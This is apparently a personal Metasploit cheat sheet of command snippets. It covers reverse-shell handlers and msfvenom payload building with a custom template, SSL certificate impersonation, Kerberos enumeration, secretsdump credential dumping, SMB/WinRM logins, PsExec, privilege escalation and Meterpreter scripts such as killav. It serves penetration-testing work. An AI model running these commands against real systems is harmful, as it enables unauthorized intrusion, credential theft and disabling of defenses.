hckhsn

Metasploit

3 min read

Metasploit - Cheat Sheet

maxLevel: 3

Core

Jobs

#List Jobs
jobs -l
#Kill all Jobs
jobs -K
#Kill single Job by ID
jobs -k 1

Module

#navigate through different active modules
use exploit/multi/handler
#push module on stack
pushm
use post/multi/recon/local_exploit_suggester
set session 1
use scanner/smb/smb_login
#list stack
listm
[*] Module stack:
 
[1]     post/multi/recon/local_exploit_suggester
[0]     exploit/multi/handler
#go to previous module and delete it from the stack
popm

RHOSTS ip address list

set RHOSTS file:/home/user/iplist.txt

Run (Backgroundjob)

use exploit/multi/handler
run -p windows/shell/reverse_tcp lhost=0.0.0.0 lport=443 -j

Sessions

#List Sessions
sessions
#Select Session
sessions -i 1
msf> search platform:windows port:135 target:XP type:exploit
#list available keywords
msf>help search

Custom

Custom Templates

metasploit-framework/data/templates/src/pe/exe/template_x64_windows.asm

change 4096 to 8192

C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.38.33130\bin\Hostx64\x64>ml64.exe c:\tmp\template_x64_windows.asm /link /subsystem:windows /defaultlib:"C:\Program Files (x86)\Windows Kits\10\Lib\10.0.22621.0\um\x64\kernel32.Lib" /entry:main
msfvenom -x template_x64_windows.asm -p windows/x64/shell_reverse_tcp LHOST=0.0.0.0 LPORT=4500 -f exe > file.exe

Custom SSL

Run impersonate_ssl Module and configure the handler:

set HandlerSSLCert /home/path/cert.pem
set StagerVerifySSLCert true
run

Database

Databases can be initialized with root@kali:~# msfdb init. This creates a database with a user and password and sets up the database schema.

msf6 > db_connect user:pass@localhost/msf
msf6 > db_status
msf6 > workspace
msf6 > workspace -a new_ws
msf6 > db_nmap -sP 192.168.2.0/24
msf6 > hosts
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > hosts -R
msf6 auxiliary(scanner/portscan/tcp) > run

Metasploit with PostgreSQL

ALTER DATABASE Version mismatch

sudo -u postgres psql
\l
ALTER DATABASE <dbnames> REFRESH COLLATION VERSION;
\q
service postgresql restart

Password reset for user msf

sudo -u postgres psql
\password msf
Enter new password for user "msf": 
Enter it again: 
msfdb reinit

Port Problems with PostgreSQL 15 and 16 installed

sudo nano /etc/postgresql/16/main/postgresql.conf # find "port = 5433" and change it to "port = 5422"
sudo nano /etc/postgresql/15/main/postgresql.conf # find "port = 5432" and change it to "port = 5433"
sudo nano /etc/postgresql/16/main/postgresql.conf # find "port = 5422" and change it to "port = 5432"
msfdb reinit
msfdb status

Meterpreter

Modules

Liste Module

load -l

Scripts

Reference

meterpreter > run scriptname
ScriptnameAction
checkvmcheck if target system is a VM
getcountermeasurechecks security settings
getguitry to enable RDP
get_local_subnetslist local subnets
gettelnetenable telnet
hostseditedit the hosts file
killavtry to kill antivirus
remotewinenumenumerate system information
scraperenumerate more system information
winenumdetailed windows enumeration

Modules

Auxiliary

Kerberos User Enumeration

use auxiliary/gather/kerberos_enumusers
set rhosts $ip
set threads 10
set USER_FILE /path/to/list.txt
creds

SSL

impersonate_ssl
use auxiliary/gather/impersonate_ssl
set RHOSTS www.google.com
set ADD_CN true
set ADD_SAN true
run

SMB

Impacket Secretsdump
use scanner/smb/impacket/secretsdump
set RHOSTS 192.168.1.1
set SMBDOMAIN domain
set SMBUSER user
set SMBPASS pass
SMB Login
use scanner/smb/smb_login
auxiliary(scanner/smb/smb_login) > run CreateSession=true RHOSTS=172.14.2.164 RPORT=445 SMBDomain=windomain.local SMBPass=password SMBUser=username
sessions -i 1

WinRM

WinRM_Login
use scanner/winrm/winrm_login
run CreateSession=true RHOSTS=172.14.2.164 SMBDomain=windomain.local SMBPass=password SMBUser=username

Post

SMB PsExec

use exploit/windows/smb/psexec
set rhost 127.0.0.1
set smbuser mega-admin
set smbpass p4ss
run

Local Exploit Suggester

use post/multi/recon/local_exploit_suggester
set SESSION 1

Upgrade Shell to Meterpreter

use post/multi/manage/shell_to_meterpreter
set SESSION 1

Privilege Escalation

Service

use exploit/windows/local/service_permissions
run lhost=0.0.0.0 lport=12222

UAC Enumeration

use post/windows/gather/win_privs
set SESSION 1

Plugins

Alias

load alias
alias s set
alias sg setg

Aliases

AliasCommand
srsearch
sset
sgsetg
rrun
uuse
ooptions
aalias
advadvanced
rcresource

wiki

load wiki
Wiki Commands
=============
    Command           Description
    -------           -----------
    dokuwiki          Outputs data from the current workspace in dokuwiki markup.
    mediawiki         Outputs data from the current workspace in mediawiki markup.

wmap

load wmap
wmap_sites -a http://vict.im
wmap_targets -d 0
wmap_run -t
wmap_run -e
wmap_vulns

Resources

Tags

Graphansicht